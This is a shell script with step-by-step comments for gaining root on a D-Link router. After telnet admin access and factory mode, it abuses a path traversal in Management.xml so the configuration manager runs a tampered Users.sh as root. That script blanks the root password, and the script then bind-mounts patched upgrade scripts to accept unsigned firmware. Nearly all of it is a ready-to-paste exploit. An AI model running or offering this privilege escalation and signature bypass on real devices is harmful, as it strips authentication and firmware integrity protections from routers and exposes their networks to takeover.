#!/bin/ash # # script to be executed on router to become root: # enter into facotry mode with the following commands: # # ===== step 1 ====== #valerio@ubuntu-hp:~$ telnet # Trying # Connected to # Escape character is '^]'. # Login: admin # Password: # ******************************************** # * D-Link * # * * # * WARNING: Authorised Access Only * # ******************************************** # Welcome # DLINK# factory # DLINK(factory)# factory-mode # DLINK(factory)# # DLINK(factory)# Connection closed by foreign host. # ======== end of step 1 # the router reboots and restart in factory mode # DHCP is disabled so you have to assign a static IP address # to your PC to connecto to the router using ethernet # now login again and enter a linux shell with the # "system shell" command # ======== step 2 ============= # valerio@ubuntu-hp:~$ telnet # Trying # Connected to # Escape character is '^]'. # Login: admin # Password: # ******************************************** # * D-Link * # * * # * WARNING: Authorised Access Only * # ******************************************** # Welcome # DLINK# system shell # BusyBox v1.17.3 (2018-04-11 12:29:54 CEST) built-in shell (ash) # Enter 'help' for a list of built-in commands. # /root $ # ======== end of step 2 ======== # now execute this script on the target copying it into the /tmp # folder. You can use scp to copy this script from you Linux PC # or you can do a simpler copy/paste to a file: # # ======== step 3 =========== # /root $ cat > /tmp/hack-script.sh # do a copy and paste of this script # press CTRL-D to terminate the copy # # /root $ chmod a+x /tmp/hack-script.sh # /root $ /tmp/hack-script.sh # copy in /tmp and modify /etc/cm/tr181/dom/Management.xml # replacing 'Users.sh' with '../../tmp/Users.sh' # copy in /tmp and modify /etc/ah/Users.sh # introducig the following line to enabl root without password: # sed -i 's/^root:\*:0:0:root:/root::0:0:root:/' # reconfiguring cm with the following command: # cmclient DOM Device /tmp/Management.xml # OK # force excution of /tmp/Users.sh as root with the following command: # cmclient ADD Device.Users.User # 4 # Done, now you can become root with the following command: # su - # ======= end of step 3 =========== # # you can now become root as shown below # # ======= step 4 # /root $ su - # # BusyBox v1.17.3 (2018-04-11 12:29:54 CEST) built-in shell (ash) # Enter 'help' for a list of built-in commands. # # .................................................................. # root@localhost:~# # ====== end of step 4 # # --------- copy/paste from the line below -------------------------- #!/bin/ash echo "copy in /tmp and modify /etc/cm/tr181/dom/Management.xml" echo "replacing 'Users.sh' with '../../tmp/Users.sh'" cat /etc/cm/tr181/dom/Management.xml | \ sed 's/Users.sh/\.\.\/\.\.\/tmp\/Users.sh/g' > /tmp/Management.xml echo "copy in /tmp and modify /etc/ah/Users.sh" echo "introducig the following line to enabl root without password:" echo " sed -i 's/^root:\*:0:0:root:/root::0:0:root:/'" cat /etc/ah/Users.sh | \ sed 's/\#\!\/bin\/sh/\#\!\/bin\/sh\nsed -i "s\/\^root:\\\*:0:0:root:\/root::0:0:root:\/" \/tmp\/passwd/' \ > /tmp/Users.sh chmod a+x /tmp/Users.sh echo "reconfiguring cm with the following command:" echo "cmclient DOM Device /tmp/Management.xml" cmclient DOM Device /tmp/Management.xml echo "force excution of /tmp/Users.sh as root with the following command:" echo " cmclient ADD Device.Users.User" cmclient ADD Device.Users.User echo "Done, now you can become root with the following command:" echo "su -" echo "enable, until reboot, upgrade with an unsigned firmware" cp -p /usr/sbin/upgrade.sh /tmp/upgrade.sh cat /usr/sbin/upgrade.sh | sed -r 's/ret_code\=\$\?/ret_code\=0/' > /tmp/upgrade.sh su -c "mount --bind /tmp/upgrade.sh /usr/sbin/upgrade.sh" - cp -p /usr/sbin/custom-upgrade-check.sh /tmp/custom-upgrade-check.sh cat /usr/sbin/custom-upgrade-check.sh | sed 's/^exit 12/\$\(printError "ignoring previous error"\)/' > /tmp/custom-upgrade-check.sh su -c "mount --bind /tmp/custom-upgrade-check.sh /usr/sbin/custom-upgrade-check.sh" -